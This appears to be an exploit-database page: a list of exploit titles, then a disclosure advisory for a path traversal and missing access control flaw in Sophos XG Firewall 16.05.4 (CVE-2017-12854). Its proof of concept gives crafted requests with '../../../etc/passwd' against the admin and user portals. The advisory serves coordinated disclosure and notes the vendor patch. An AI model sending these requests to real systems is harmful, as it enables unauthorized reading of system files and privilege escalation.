e630f8c249
45 changes to exploits/shellcodes Cisco ASA - Crash PoC Cisco ASA - Crash (PoC) GNU binutils 2.26.1 - Integer Overflow (POC) GNU binutils 2.26.1 - Integer Overflow (PoC) K7 Total Security 15.1.0.305 - Device Driver Arbitrary Memory Read Linux Kernel - 'AF_PACKET' Use-After-Free Oracle Java JDK/JRE < 1.8.0.131 / Apache Xerces 2.11.0 - 'PDF/Docx' Server Side Denial of Service Microsoft Edge Chakra JIT - 'GlobOpt::OptTagChecks' Must Consider IsLoopPrePass Properly (2) Microsoft Edge Chakra JIT - Memory Corruption Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass Microsoft Edge Chakra JIT - Array Type Confusion via InitProto Instructions Microsoft Edge Chakra JIT - 'Array.prototype.reverse' Array Type Confusion Microsoft Edge Chakra JIT - 'NewScObjectNoCtor' Array Type Confusion Microsoft Edge Chakra JIT - 'LdThis' Type Confusion Pdfium - Pattern Shading Integer Overflows Pdfium - Out-of-Bounds Read with Shading Pattern Backed by Pattern Colorspace Chrome V8 - 'Runtime_RegExpReplace' Integer Overflow Hotspot Shield - Information Disclosure Linux Kernel (Ubuntu 17.04) - 'XFRM' Local Privilege Escalation Nitro Pro PDF - Multiple Vulnerabilities Odoo CRM 10.0 - Code Execution Dashlane - DLL Hijacking LightDM (Ubuntu 16.04/16.10) - Guest Account Local Privilege Escalation LightDM (Ubuntu 16.04/16.10) - 'Guest Account' Local Privilege Escalation Trustwave SWG 11.8.0.27 - SSH Unauthorized Access Ichano AtHome IP Cameras - Multiple Vulnerabilities Cisco UCS Platform Emulator 3.1(2ePE1) - Remote Code Execution Ikraus Anti Virus 2.16.7 - Remote Code Execution McAfee Security Scan Plus - Remote Command Execution OrientDB - Code Execution 360 Total Security - Local Privilege Escalation HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution Oracle Knowledge Management 12.1.1 < 12.2.5 - XML External Entity Leading To Remote Code Execution iBall WRA150N - Multiple Vulnerabilities GitStack - Unauthenticated Remote Code Execution Monstra CMS - Remote Code Execution Ametys CMS 4.0.2 - Unauthenticated Password Reset DblTek - Multiple Vulnerabilities FiberHome - Directory Traversal PHP Melody 2.7.3 - Multiple Vulnerabilities Tiandy IP Cameras 5.56.17.120 - Sensitive Information Disclosure Horde Groupware 5.2.21 - Unauthorized File Download QNAP HelpDesk < 1.1.12 - SQL Injection Hanbanggaoke IP Camera - Arbitrary Password Change McAfee LiveSafe 16.0.3 - Man In The Middle Registry Modification Leading to Remote Command Execution Sophos XG Firewall 16.05.4 MR-4 - Path Traversal Cisco DPC3928 Router - Arbitrary File Disclosure IDERA Uptime Monitor 7.8 - Multiple Vulnerabilities Geneko Routers - Unauthenticated Path Traversal Dasan Networks GPON ONT WiFi Router H640X versions 12.02-01121 / 2.77p1-1124 / 3.03p2-1146 - Unauthenticated Remote Code Execution
3.2 KiB
Vulnerabilities Summary
The following advisory describe two (2) vulnerabilities, a Path Traversal and a Missing Function Level Access Control, in Sophos XG Firewall 16.05.4 MR-4.
Sophos XG Firewall provides “unprecedented visibility into your network, users, and applications directly from the all-new control center. You also get rich on-box reporting and the option to add Sophos iView for centralized reporting across multiple firewalls”.
Credit
An independent security researcher has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program
Vendor response
The vendor has released patches to address this vulnerability: “The patches were released as part of SFOS 16.05.5 MR5: https://community.sophos.com/products/xg-firewall/b/xg-blog/posts/sfos-16-05-5-mr5-released
Our internal bug number was NC-18958, mentioned in the changelog”
CVE: CVE-2017-12854
Vulnerabilities Details
The Sophos XG Firewall hosts 2 different web portals. The first is the web administration portal used to manage the firewall (Sophos XG Fireweal portal), the second is the “User Portal” used to unprivileged user to access to a restricted group of function like to trace their traffic quotas, to see SMTP quarantined mail and to download authentication client.
The appliance has a web download function in Sophos XG Fireweal portal to allow downloading of a range of file like, logs and certificate keys.
Crafting the download request and adding a path traversal vector to it, an authenticated user, can use this function to download files that are outside the normal scope of the download feature (including sensitive files).
In addition, the function can be called from a low privileged user, a user that is logged on to the User Portal (i.e. Missing Function Level Access Control), a combinations of these two vulnerabilities can be used to compromise the integrity of the server, by allowing a User Portal to elevate his privileges.
Proof of Concept
Log in the Sophos XG Firewall admin portal
Using developer tools of Firefox (F12) or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the Hackbar or use other tools to send a new crafted request:
URL https://192.168.0.188:4444/webconsole/Controller?filename=../../../etc/passwd&mode=4010
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188:4444/webconsole/webpages/index.jsp
This will start the download of the /etc/passwd file:
Create from the admin portal an user of the User Portal (Authentication > User > Add)
Login in the User Portal using the new user
Using developer tools of Firefox or analyzing the html code of the loaded page (Cyberoam.c$rFt0k3n parameter), extract the csrf code.
Open the hack bar or use other tools to send a new crafted request:
URL https://192.168.0.188/userportal/Controller?filename=../../../etc/passwd&mode=4010&json=%7B%22lang%22%3A%220%22%7D
postdata csrf=<== THE PARAMETER YOU HAVE FOUND ==>
referrer https://192.168.0.188/userportal/webpages/myaccount/index.jsp
This will start the download